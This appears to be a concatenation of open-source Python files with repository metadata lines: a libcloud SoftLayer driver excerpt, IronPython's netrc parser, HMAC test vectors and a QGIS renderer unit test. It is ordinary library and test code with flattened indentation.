bandwidth = kwargs.get('ex_bandwidth') or size.bandwidth or 10
hourly = 'true' if kwargs.get('ex_hourly', True) else 'false'
local_disk = 'true'
if ex_size_data.get('local_disk') is False:
local_disk = 'false'
if kwargs.get('ex_local_disk') is False:
local_disk = 'false'
disk_size = DEFAULT_DISK_SIZE
if size.disk:
disk_size = size.disk
if kwargs.get('ex_disk'):
disk_size = kwargs.get('ex_disk')
datacenter = ''
if 'ex_datacenter' in kwargs:
datacenter = kwargs['ex_datacenter']
elif 'location' in kwargs:
datacenter = kwargs['location'].id
domain = kwargs.get('ex_domain')
if domain is None:
if name.find('.') != -1:
domain = name[name.find('.') + 1:]
if domain is None:
# TODO: domain is a required argument for the SoftLayer API, but it
# shouldn't be.
domain = DEFAULT_DOMAIN
newCCI = {
'hostname': name,
'domain': domain,
'startCpus': cpu_count,
'maxMemory': ram,
'networkComponents': [{'maxSpeed': bandwidth}],
'hourlyBillingFlag': hourly,
'operatingSystemReferenceCode': os,
'localDiskFlag': local_disk,
'blockDevices': [
{
'device': '0',
'diskImage': {
'capacity': disk_size,
}
}
]
}
if datacenter:
newCCI['datacenter'] = {'name': datacenter}
if 'ex_keyname' in kwargs:
newCCI['sshKeys'] = [
{
'id': self._key_name_to_id(kwargs['ex_keyname'])
}
]
res = self.connection.request(
'SoftLayer_Virtual_Guest', 'createObject', newCCI
).object
node_id = res['id']
raw_node = self._get_order_information(node_id)
return self._to_node(raw_node)
def list_key_pairs(self):
result = self.connection.request(
'SoftLayer_Account', 'getSshKeys'
).object
elems = [x for x in result]
key_pairs = self._to_key_pairs(elems=elems)
return key_pairs
def get_key_pair(self, name):
key_id = self._key_name_to_id(name=name)
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'getObject', id=key_id
).object
return self._to_key_pair(result)
# TODO: Check this with the libcloud guys,
# can we create new dependencies?
def create_key_pair(self, name, ex_size=4096):
if crypto is False:
raise NotImplementedError('create_key_pair needs '
'the pycrypto library')
key = RSA.generate(ex_size)
new_key = {
'key': key.publickey().exportKey('OpenSSH'),
'label': name,
'notes': '',
}
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'createObject', new_key
).object
result['private'] = key.exportKey('PEM')
return self._to_key_pair(result)
def import_key_pair_from_string(self, name, key_material):
new_key = {
'key': key_material,
'label': name,
'notes': '',
}
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'createObject', new_key
).object
key_pair = self._to_key_pair(result)
return key_pair
def delete_key_pair(self, key_pair):
key = self._key_name_to_id(key_pair)
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'deleteObject', id=key
).object
return result
def _to_image(self, img):
return NodeImage(
id=img['template']['operatingSystemReferenceCode'],
name=img['itemPrice']['item']['description'],
driver=self.connection.driver
)
def list_images(self, location=None):
result = self.connection.request(
'SoftLayer_Virtual_Guest', 'getCreateObjectOptions'
).object
return [self._to_image(i) for i in result['operatingSystems']]
def _to_size(self, id, size):
return NodeSize(
id=id,
name=size['name'],
ram=size['ram'],
disk=size['disk'],
bandwidth=size.get('bandwidth'),
price=None,
driver=self.connection.driver,
)
def list_sizes(self, location=None):
return [self._to_size(id, s) for id, s in SL_TEMPLATES.items()]
def _to_loc(self, loc):
country = 'UNKNOWN'
loc_id = loc['template']['datacenter']['name']
name = loc_id
if loc_id in DATACENTERS:
country = DATACENTERS[loc_id]['country']
name = DATACENTERS[loc_id].get('name', loc_id)
return NodeLocation(id=loc_id, name=name,
country=country, driver=self)
def list_locations(self):
res = self.connection.request(
'SoftLayer_Virtual_Guest', 'getCreateObjectOptions'
).object
return [self._to_loc(l) for l in res['datacenters']]
def list_nodes(self):
mask = {
'virtualGuests': {
'powerState': '',
'hostname': '',
'maxMemory': '',
'datacenter': '',
'operatingSystem': {'passwords': ''},
'billingItem': '',
},
}
res = self.connection.request(
'SoftLayer_Account',
'getVirtualGuests',
object_mask=mask
).object
return [self._to_node(h) for h in res]
def _to_key_pairs(self, elems):
key_pairs = [self._to_key_pair(elem=elem) for elem in elems]
return key_pairs
def _to_key_pair(self, elem):
key_pair = KeyPair(name=elem['label'],
public_key=elem['key'],
fingerprint=elem['fingerprint'],
private_key=elem.get('private', None),
driver=self,
extra={'id': elem['id']})
return key_pair
def _key_name_to_id(self, name):
result = self.connection.request(
'SoftLayer_Account', 'getSshKeys'
).object
key_id = [x for x in result if x['label'] == name]
if len(key_id) == 0:
raise KeyPairDoesNotExistError(name, self)
else:
return int(key_id[0]['id'])
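# --- Hedged illustration (not part of the original module) ---
# A minimal sketch of driving this driver through libcloud's standard entry
# points, mirroring the ex_* keywords documented in create_node() above.
# The credentials, hostname and datacenter are placeholders; a real
# SoftLayer account is required for these calls to succeed.
if __name__ == '__main__':
    from libcloud.compute.providers import get_driver
    from libcloud.compute.types import Provider as _Provider

    _cls = get_driver(_Provider.SOFTLAYER)
    _driver = _cls('my-user', 'my-api-key')  # placeholder credentials
    _node = _driver.create_node(name='demo1.example.com',
                                ex_cpus=2,
                                ex_ram=2048,
                                ex_disk=100,
                                ex_os='UBUNTU_LATEST',
                                ex_datacenter='dal05')
    print(_node)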
|
apache-2.0
|
Gravecorp/Gap
|
packages/IronPython.StdLib.2.7.3/content/Lib/netrc.py
|
168
|
4576
|
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
import os, shlex
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise IOError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp)
def _parse(self, file, fp):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
lexer.commenters = lexer.commenters.replace('#', '')
while 1:
# Look for a machine, default, or macdef top-level keyword
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt[0] == '#':
# seek to beginning of comment, in case reading the token put
# us on a new line, and then skip the rest of the line.
pos = len(tt) + 1
lexer.instream.seek(-pos, 1)
lexer.instream.readline()
continue
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt.startswith('#') or
tt in {'', 'machine', 'default', 'macdef'}):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print netrc()
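# --- Hedged illustration (not part of the original module) ---
# A minimal sketch of the authenticators() lookup described above, parsing a
# throwaway .netrc-style file instead of $HOME/.netrc. The host name and
# credentials are made up for demonstration; this runs after the module's
# own demo above, which reads the real $HOME/.netrc.
if __name__ == '__main__':
    import tempfile
    _tmp = tempfile.NamedTemporaryFile(mode='w', suffix='.netrc', delete=False)
    _tmp.write('machine ftp.example.com login anonymous password guest\n')
    _tmp.close()
    print(netrc(_tmp.name).authenticators('ftp.example.com'))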
|
mpl-2.0
|
adaussy/eclipse-monkey-revival
|
plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_hmac.py
|
4
|
13149
|
import hmac
import hashlib
import unittest
import warnings
from test import test_support
class TestVectorsTestCase(unittest.TestCase):
def test_md5_vectors(self):
# Test the HMAC module against test vectors from the RFC.
def md5test(key, data, digest):
h = hmac.HMAC(key, data)
self.assertEqual(h.hexdigest().upper(), digest.upper())
md5test(chr(0x0b) * 16,
"Hi There",
"9294727A3638BB1C13F48EF8158BFC9D")
md5test("Jefe",
"what do ya want for nothing?",
"750c783e6ab0b503eaa86e310a5db738")
md5test(chr(0xAA)*16,
chr(0xDD)*50,
"56be34521d144c88dbb8c733f0e8b3f6")
md5test("".join([chr(i) for i in range(1, 26)]),
chr(0xCD) * 50,
"697eaf0aca3a3aea3a75164746ffaa79")
md5test(chr(0x0C) * 16,
"Test With Truncation",
"56461ef2342edc00f9bab995690efd4c")
md5test(chr(0xAA) * 80,
"Test Using Larger Than Block-Size Key - Hash Key First",
"6b1ab7fe4bd7bf8f0b62e6ce61b9d0cd")
md5test(chr(0xAA) * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
def test_sha_vectors(self):
def shatest(key, data, digest):
h = hmac.HMAC(key, data, digestmod=hashlib.sha1)
self.assertEqual(h.hexdigest().upper(), digest.upper())
shatest(chr(0x0b) * 20,
"Hi There",
"b617318655057264e28bc0b6fb378c8ef146be00")
shatest("Jefe",
"what do ya want for nothing?",
"effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
shatest(chr(0xAA)*20,
chr(0xDD)*50,
"125d7342b9ac11cd91a39af48aa17b4f63f175d3")
shatest("".join([chr(i) for i in range(1, 26)]),
chr(0xCD) * 50,
"4c9007f4026250c6bc8414f9bf50c86c2d7235da")
shatest(chr(0x0C) * 20,
"Test With Truncation",
"4c1a03424b55e07fe7f27be1d58bb9324a9a5a04")
shatest(chr(0xAA) * 80,
"Test Using Larger Than Block-Size Key - Hash Key First",
"aa4ae5e15272d00e95705637ce8a3b55ed402112")
shatest(chr(0xAA) * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"e8e99d0f45237d786d6bbaa7965c7808bbff1a91")
def _rfc4231_test_cases(self, hashfunc):
def hmactest(key, data, hexdigests):
h = hmac.HMAC(key, data, digestmod=hashfunc)
self.assertEqual(h.hexdigest().lower(), hexdigests[hashfunc])
# 4.2. Test Case 1
hmactest(key = '\x0b'*20,
data = 'Hi There',
hexdigests = {
hashlib.sha224: '896fb1128abbdf196832107cd49df33f'
'47b4b1169912ba4f53684b22',
hashlib.sha256: 'b0344c61d8db38535ca8afceaf0bf12b'
'881dc200c9833da726e9376c2e32cff7',
hashlib.sha384: 'afd03944d84895626b0825f4ab46907f'
'15f9dadbe4101ec682aa034c7cebc59c'
'faea9ea9076ede7f4af152e8b2fa9cb6',
hashlib.sha512: '87aa7cdea5ef619d4ff0b4241a1d6cb0'
'2379f4e2ce4ec2787ad0b30545e17cde'
'daa833b7d6b8a702038b274eaea3f4e4'
'be9d914eeb61f1702e696c203a126854',
})
# 4.3. Test Case 2
hmactest(key = 'Jefe',
data = 'what do ya want for nothing?',
hexdigests = {
hashlib.sha224: 'a30e01098bc6dbbf45690f3a7e9e6d0f'
'8bbea2a39e6148008fd05e44',
hashlib.sha256: '5bdcc146bf60754e6a042426089575c7'
'5a003f089d2739839dec58b964ec3843',
hashlib.sha384: 'af45d2e376484031617f78d2b58a6b1b'
'9c7ef464f5a01b47e42ec3736322445e'
'8e2240ca5e69e2c78b3239ecfab21649',
hashlib.sha512: '164b7a7bfcf819e2e395fbe73b56e0a3'
'87bd64222e831fd610270cd7ea250554'
'9758bf75c05a994a6d034f65f8f0e6fd'
'caeab1a34d4a6b4b636e070a38bce737',
})
# 4.4. Test Case 3
hmactest(key = '\xaa'*20,
data = '\xdd'*50,
hexdigests = {
hashlib.sha224: '7fb3cb3588c6c1f6ffa9694d7d6ad264'
'9365b0c1f65d69d1ec8333ea',
hashlib.sha256: '773ea91e36800e46854db8ebd09181a7'
'2959098b3ef8c122d9635514ced565fe',
hashlib.sha384: '88062608d3e6ad8a0aa2ace014c8a86f'
'0aa635d947ac9febe83ef4e55966144b'
'2a5ab39dc13814b94e3ab6e101a34f27',
hashlib.sha512: 'fa73b0089d56a284efb0f0756c890be9'
'b1b5dbdd8ee81a3655f83e33b2279d39'
'bf3e848279a722c806b485a47e67c807'
'b946a337bee8942674278859e13292fb',
})
# 4.5. Test Case 4
hmactest(key = ''.join([chr(x) for x in xrange(0x01, 0x19+1)]),
data = '\xcd'*50,
hexdigests = {
hashlib.sha224: '6c11506874013cac6a2abc1bb382627c'
'ec6a90d86efc012de7afec5a',
hashlib.sha256: '82558a389a443c0ea4cc819899f2083a'
'85f0faa3e578f8077a2e3ff46729665b',
hashlib.sha384: '3e8a69b7783c25851933ab6290af6ca7'
'7a9981480850009cc5577c6e1f573b4e'
'6801dd23c4a7d679ccf8a386c674cffb',
hashlib.sha512: 'b0ba465637458c6990e5a8c5f61d4af7'
'e576d97ff94b872de76f8050361ee3db'
'a91ca5c11aa25eb4d679275cc5788063'
'a5f19741120c4f2de2adebeb10a298dd',
})
# 4.7. Test Case 6
hmactest(key = '\xaa'*131,
data = 'Test Using Larger Than Block-Siz'
'e Key - Hash Key First',
hexdigests = {
hashlib.sha224: '95e9a0db962095adaebe9b2d6f0dbce2'
'd499f112f2d2b7273fa6870e',
hashlib.sha256: '60e431591ee0b67f0d8a26aacbf5b77f'
'8e0bc6213728c5140546040f0ee37f54',
hashlib.sha384: '4ece084485813e9088d2c63a041bc5b4'
'4f9ef1012a2b588f3cd11f05033ac4c6'
'0c2ef6ab4030fe8296248df163f44952',
hashlib.sha512: '80b24263c7c1a3ebb71493c1dd7be8b4'
'9b46d1f41b4aeec1121b013783f8f352'
'6b56d037e05f2598bd0fd2215d6a1e52'
'95e64f73f63f0aec8b915a985d786598',
})
# 4.8. Test Case 7
hmactest(key = '\xaa'*131,
data = 'This is a test using a larger th'
'an block-size key and a larger t'
'han block-size data. The key nee'
'ds to be hashed before being use'
'd by the HMAC algorithm.',
hexdigests = {
hashlib.sha224: '3a854166ac5d9f023f54d517d0b39dbd'
'946770db9c2b95c9f6f565d1',
hashlib.sha256: '9b09ffa71b942fcb27635fbcd5b0e944'
'bfdc63644f0713938a7f51535c3a35e2',
hashlib.sha384: '6617178e941f020d351e2f254e8fd32c'
'602420feb0b8fb9adccebb82461e99c5'
'a678cc31e799176d3860e6110c46523e',
hashlib.sha512: 'e37b6a775dc87dbaa4dfa9f96e5e3ffd'
'debd71f8867289865df5a32d20cdc944'
'b6022cac3c4982b10d5eeb55c3e4de15'
'134676fb6de0446065c97440fa8c6a58',
})
def test_sha224_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha224)
def test_sha256_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha256)
def test_sha384_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha384)
def test_sha512_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha512)
def test_legacy_block_size_warnings(self):
class MockCrazyHash(object):
"""Ain't no block_size attribute here."""
def __init__(self, *args):
self._x = hashlib.sha1(*args)
self.digest_size = self._x.digest_size
def update(self, v):
self._x.update(v)
def digest(self):
return self._x.digest()
with warnings.catch_warnings():
warnings.simplefilter('error', RuntimeWarning)
with self.assertRaises(RuntimeWarning):
hmac.HMAC('a', 'b', digestmod=MockCrazyHash)
self.fail('Expected warning about missing block_size')
MockCrazyHash.block_size = 1
with self.assertRaises(RuntimeWarning):
hmac.HMAC('a', 'b', digestmod=MockCrazyHash)
self.fail('Expected warning about small block_size')
class ConstructorTestCase(unittest.TestCase):
def test_normal(self):
# Standard constructor call.
failed = 0
try:
h = hmac.HMAC("key")
except:
self.fail("Standard constructor call raised exception.")
def test_withtext(self):
# Constructor call with text.
try:
h = hmac.HMAC("key", "hash this!")
except:
self.fail("Constructor call with text argument raised exception.")
def test_withmodule(self):
# Constructor call with text and digest module.
try:
h = hmac.HMAC("key", "", hashlib.sha1)
except:
self.fail("Constructor call with hashlib.sha1 raised exception.")
class SanityTestCase(unittest.TestCase):
def test_default_is_md5(self):
# Testing if HMAC defaults to MD5 algorithm.
# NOTE: this whitebox test depends on the hmac class internals
h = hmac.HMAC("key")
self.assertTrue(h.digest_cons == hashlib.md5)
def test_exercise_all_methods(self):
# Exercising all methods once.
# This must not raise any exceptions
try:
h = hmac.HMAC("my secret key")
h.update("compute the hash of this text!")
dig = h.digest()
dig = h.hexdigest()
h2 = h.copy()
except:
self.fail("Exception raised during normal usage of HMAC class.")
class CopyTestCase(unittest.TestCase):
def test_attributes(self):
# Testing if attributes are of same type.
h1 = hmac.HMAC("key")
h2 = h1.copy()
self.assertTrue(h1.digest_cons == h2.digest_cons,
"digest constructors don't match.")
self.assertTrue(type(h1.inner) == type(h2.inner),
"Types of inner don't match.")
self.assertTrue(type(h1.outer) == type(h2.outer),
"Types of outer don't match.")
def test_realcopy(self):
# Testing if the copy method created a real copy.
h1 = hmac.HMAC("key")
h2 = h1.copy()
# Using id() in case somebody has overridden __cmp__.
self.assertTrue(id(h1) != id(h2), "No real copy of the HMAC instance.")
self.assertTrue(id(h1.inner) != id(h2.inner),
"No real copy of the attribute 'inner'.")
self.assertTrue(id(h1.outer) != id(h2.outer),
"No real copy of the attribute 'outer'.")
def test_equality(self):
# Testing if the copy has the same digests.
h1 = hmac.HMAC("key")
h1.update("some random text")
h2 = h1.copy()
self.assertTrue(h1.digest() == h2.digest(),
"Digest of copy doesn't match original digest.")
self.assertTrue(h1.hexdigest() == h2.hexdigest(),
"Hexdigest of copy doesn't match original hexdigest.")
def test_main():
if test_support.is_jython:
# XXX: Jython doesn't support sha224
del TestVectorsTestCase.test_sha224_rfc4231
hashlib.sha224 = None
test_support.run_unittest(
TestVectorsTestCase,
ConstructorTestCase,
SanityTestCase,
CopyTestCase
)
if __name__ == "__main__":
test_main()
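# --- Hedged illustration (not part of the original test module) ---
# A minimal standalone sketch of the HMAC-MD5 computation exercised by
# md5test() above, using the "Jefe" vector quoted in the test data
# (expected hexdigest 750c783e6ab0b503eaa86e310a5db738).
if __name__ == '__main__':
    import hmac as _hmac
    _demo = _hmac.new('Jefe', 'what do ya want for nothing?')
    print(_demo.hexdigest())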
|
epl-1.0
|
gioman/QGIS
|
tests/src/python/test_qgsgraduatedsymbolrenderer.py
|
1
|
17127
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsGraduatedSymbolRenderer
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Chris Crook'
__date__ = '3/10/2014'
__copyright__ = 'Copyright 2014, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis # NOQA
from qgis.testing import unittest, start_app
from qgis.core import (QgsGraduatedSymbolRenderer,
QgsRendererRange,
QgsRendererRangeLabelFormat,
QgsMarkerSymbol,
QgsGradientColorRamp,
QgsVectorLayer,
QgsFeature,
QgsGeometry,
QgsPoint,
QgsReadWriteContext,
QgsRenderContext
)
from qgis.PyQt.QtCore import Qt
from qgis.PyQt.QtXml import QDomDocument
from qgis.PyQt.QtGui import QColor
start_app()
#===========================================================
# Utility functions
def createMarkerSymbol():
symbol = QgsMarkerSymbol.createSimple({
"color": "100,150,50",
"name": "square",
"size": "3.0"
})
return symbol
def createMemoryLayer(values):
ml = QgsVectorLayer("Point?crs=epsg:4236&field=id:integer&field=value:double",
"test_data", "memory")
# Data as list of x, y, id, value
assert ml.isValid()
pr = ml.dataProvider()
fields = pr.fields()
for id, value in enumerate(values):
x = id * 10.0
feat = QgsFeature(fields)
feat['id'] = id
feat['value'] = value
g = QgsGeometry.fromPoint(QgsPoint(x, x))
feat.setGeometry(g)
pr.addFeatures([feat])
ml.updateExtents()
return ml
def createColorRamp():
return QgsGradientColorRamp(
QColor(255, 0, 0),
QColor(0, 0, 255)
)
def createLabelFormat():
format = QgsRendererRangeLabelFormat()
template = "%1 - %2 meters"
precision = 5
format.setFormat(template)
format.setPrecision(precision)
format.setTrimTrailingZeroes(True)
return format
# Note: Dump functions are not designed for a user friendly dump, just
# for a moderately compact representation of a renderer that is independent
# of the renderer source code and so appropriate for use in unit tests.
def dumpRangeBreaks(ranges):
return dumpRangeList(ranges, breaksOnly=True)
def dumpRangeLabels(ranges):
return dumpRangeList(ranges, labelsOnly=True)
def dumpLabelFormat(format):
return (
':' + format.format() +
':' + str(format.precision()) +
':' + str(format.trimTrailingZeroes()) +
':')
def dumpRangeList(rlist, breaksOnly=False, labelsOnly=False):
rstr = '('
format = "{0:.4f}-{1:.4f}"
if not breaksOnly:
format = format + ":{2}:{3}:{4}:"
if labelsOnly:
format = '{2}'
for r in rlist:
rstr = rstr + format.format(
r.lowerValue(),
r.upperValue(),
r.label(),
r.symbol().dump(),
r.renderState(),
) + ","
return rstr + ')'
# Crude dump for deterministic ramp - just dumps colors at a range of values
def dumpColorRamp(ramp):
if ramp is None:
return ':None:'
rampstr = ':'
for x in (0.0, 0.33, 0.66, 1.0):
rampstr = rampstr + ramp.color(x).name() + ':'
return rampstr
def dumpGraduatedRenderer(r):
rstr = ':'
rstr = rstr + r.classAttribute() + ':'
rstr = rstr + str(r.mode()) + ':'
symbol = r.sourceSymbol()
if symbol is None:
rstr = rstr + 'None' + ':'
else:
rstr = rstr + symbol.dump() + ':'
rstr = rstr + dumpColorRamp(r.sourceColorRamp())
rstr = rstr + dumpRangeList(r.ranges())
return rstr
#=================================================================
# Tests
class TestQgsGraduatedSymbolRenderer(unittest.TestCase):
def testQgsRendererRange_1(self):
"""Test QgsRendererRange getter/setter functions"""
range = QgsRendererRange()
self.assertTrue(range)
lower = 123.45
upper = 234.56
label = "Test label"
symbol = createMarkerSymbol()
range.setLowerValue(lower)
self.assertEqual(range.lowerValue(), lower, "Lower value getter/setter failed")
range.setUpperValue(upper)
self.assertEqual(range.upperValue(), upper, "Upper value getter/setter failed")
range.setLabel(label)
self.assertEqual(range.label(), label, "Label getter/setter failed")
range.setRenderState(True)
self.assertTrue(range.renderState(), "Render state getter/setter failed")
range.setRenderState(False)
self.assertFalse(range.renderState(), "Render state getter/setter failed")
range.setSymbol(symbol.clone())
self.assertEqual(symbol.dump(), range.symbol().dump(), "Symbol getter/setter failed")
range2 = QgsRendererRange(lower, upper, symbol.clone(), label, False)
self.assertEqual(range2.lowerValue(), lower, "Lower value from constructor failed")
self.assertEqual(range2.upperValue(), upper, "Upper value from constructor failed")
self.assertEqual(range2.label(), label, "Label from constructor failed")
self.assertEqual(range2.symbol().dump(), symbol.dump(), "Symbol from constructor failed")
self.assertFalse(range2.renderState(), "Render state getter/setter failed")
def testQgsRendererRangeLabelFormat_1(self):
"""Test QgsRendererRangeLabelFormat getter/setter functions"""
format = QgsRendererRangeLabelFormat()
        self.assertTrue(format, "QgsRendererRangeLabelFormat construction failed")
template = "%1 - %2 meters"
precision = 5
format.setFormat(template)
self.assertEqual(format.format(), template, "Format getter/setter failed")
format.setPrecision(precision)
self.assertEqual(format.precision(), precision, "Precision getter/setter failed")
format.setTrimTrailingZeroes(True)
self.assertTrue(format.trimTrailingZeroes(), "TrimTrailingZeroes getter/setter failed")
format.setTrimTrailingZeroes(False)
self.assertFalse(format.trimTrailingZeroes(), "TrimTrailingZeroes getter/setter failed")
minprecision = -6
maxprecision = 15
self.assertEqual(QgsRendererRangeLabelFormat.MIN_PRECISION, minprecision, "Minimum precision != -6")
self.assertEqual(QgsRendererRangeLabelFormat.MAX_PRECISION, maxprecision, "Maximum precision != 15")
format.setPrecision(-10)
self.assertEqual(format.precision(), minprecision, "Minimum precision not enforced")
format.setPrecision(20)
self.assertEqual(format.precision(), maxprecision, "Maximum precision not enforced")
def testQgsRendererRangeLabelFormat_2(self):
"""Test QgsRendererRangeLabelFormat number format"""
format = QgsRendererRangeLabelFormat()
# Tests have precision, trim, value, expected
# (Note: Not sure what impact of locale is on these tests)
tests = (
(2, False, 1.0, '1.00'),
(2, True, 1.0, '1'),
(2, False, 1.234, '1.23'),
(2, True, 1.234, '1.23'),
(2, False, 1.236, '1.24'),
(2, False, -1.236, '-1.24'),
(2, False, -0.004, '0.00'),
(2, True, 1.002, '1'),
(2, True, 1.006, '1.01'),
(2, True, 1.096, '1.1'),
(3, True, 1.096, '1.096'),
(-2, True, 1496.45, '1500'),
(-2, True, 149.45, '100'),
(-2, True, 79.45, '100'),
(-2, True, 49.45, '0'),
(-2, True, -49.45, '0'),
(-2, True, -149.45, '-100'),
)
for f in tests:
precision, trim, value, expected = f
format.setPrecision(precision)
format.setTrimTrailingZeroes(trim)
result = format.formatNumber(value)
self.assertEqual(result, expected,
"Number format error {0}:{1}:{2} => {3}".format(
precision, trim, value, result))
# Label tests - label format, expected result.
# Labels will be evaluated with lower=1.23 upper=2.34, precision=2
ltests = (
("%1 - %2", "1.23 - 2.34"),
("%1", "1.23"),
("%2", "2.34"),
("%2%", "2.34%"),
("%1%1", "1.231.23"),
("from %1 to %2 meters", "from 1.23 to 2.34 meters"),
("from %2 to %1 meters", "from 2.34 to 1.23 meters"),
)
format.setPrecision(2)
format.setTrimTrailingZeroes(False)
lower = 1.232
upper = 2.339
for t in ltests:
label, expected = t
format.setFormat(label)
result = format.labelForLowerUpper(lower, upper)
self.assertEqual(result, expected, "Label format error {0} => {1}".format(
label, result))
range = QgsRendererRange()
range.setLowerValue(lower)
range.setUpperValue(upper)
label = ltests[0][0]
format.setFormat(label)
result = format.labelForRange(range)
self.assertEqual(result, ltests[0][1], "Label for range error {0} => {1}".format(
label, result))
def testQgsGraduatedSymbolRenderer_1(self):
"""Test QgsGraduatedSymbolRenderer: Basic get/set functions """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
self.assertEqual(symbol.dump(), renderer.sourceSymbol().dump(), "Get/set renderer source symbol")
attr = '"value"*"value"'
renderer.setClassAttribute(attr)
self.assertEqual(attr, renderer.classAttribute(), "Get/set renderer class attribute")
for m in (
QgsGraduatedSymbolRenderer.Custom,
QgsGraduatedSymbolRenderer.EqualInterval,
QgsGraduatedSymbolRenderer.Quantile,
QgsGraduatedSymbolRenderer.Jenks,
QgsGraduatedSymbolRenderer.Pretty,
QgsGraduatedSymbolRenderer.StdDev,
):
renderer.setMode(m)
self.assertEqual(m, renderer.mode(), "Get/set renderer mode")
format = createLabelFormat()
renderer.setLabelFormat(format)
self.assertEqual(
dumpLabelFormat(format),
dumpLabelFormat(renderer.labelFormat()),
"Get/set renderer label format")
ramp = createColorRamp()
renderer.setSourceColorRamp(ramp)
self.assertEqual(
dumpColorRamp(ramp),
dumpColorRamp(renderer.sourceColorRamp()),
"Get/set renderer color ramp")
renderer.setSourceColorRamp(ramp)
self.assertEqual(
dumpColorRamp(ramp),
dumpColorRamp(renderer.sourceColorRamp()),
"Get/set renderer color ramp")
        # test for classification with varying size
renderer.setGraduatedMethod(QgsGraduatedSymbolRenderer.GraduatedSize)
renderer.setSourceColorRamp(None)
renderer.addClassLowerUpper(0, 2)
renderer.addClassLowerUpper(2, 4)
renderer.addClassLowerUpper(4, 6)
renderer.setSymbolSizes(2, 13)
self.assertEqual(renderer.maxSymbolSize(), 13)
self.assertEqual(renderer.minSymbolSize(), 2)
refSizes = [2, (13 + 2) * .5, 13]
ctx = QgsRenderContext()
for idx, symbol in enumerate(renderer.symbols(ctx)):
self.assertEqual(symbol.size(), refSizes[idx])
def testQgsGraduatedSymbolRenderer_2(self):
"""Test QgsGraduatedSymbolRenderer: Adding /removing/editing classes """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
symbol.setColor(QColor(255, 0, 0))
# Add class without start and end ranges
renderer.addClass(symbol.clone())
renderer.addClass(symbol.clone())
renderer.updateRangeLabel(1, 'Second range')
renderer.updateRangeLowerValue(1, 10.0)
renderer.updateRangeUpperValue(1, 25.0)
renderer.updateRangeRenderState(1, False)
symbol.setColor(QColor(0, 0, 255))
renderer.updateRangeSymbol(1, symbol.clone())
# Add as a rangeobject
symbol.setColor(QColor(0, 255, 0))
range = QgsRendererRange(20.0, 25.5, symbol.clone(), 'Third range', False)
renderer.addClassRange(range)
# Add class by lower and upper
renderer.addClassLowerUpper(25.5, 30.5)
# (Update label for sorting tests)
renderer.updateRangeLabel(3, 'Another range')
self.assertEqual(
dumpRangeLabels(renderer.ranges()),
'(0.0 - 0.0,Second range,Third range,Another range,)',
'Added ranges labels not correct')
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.0000-0.0000,10.0000-25.0000,20.0000-25.5000,25.5000-30.5000,)',
'Added ranges lower/upper values not correct')
# Check that clone function works
renderer2 = renderer.clone()
self.assertEqual(
dumpGraduatedRenderer(renderer),
dumpGraduatedRenderer(renderer2),
"clone function doesn't replicate renderer properly"
)
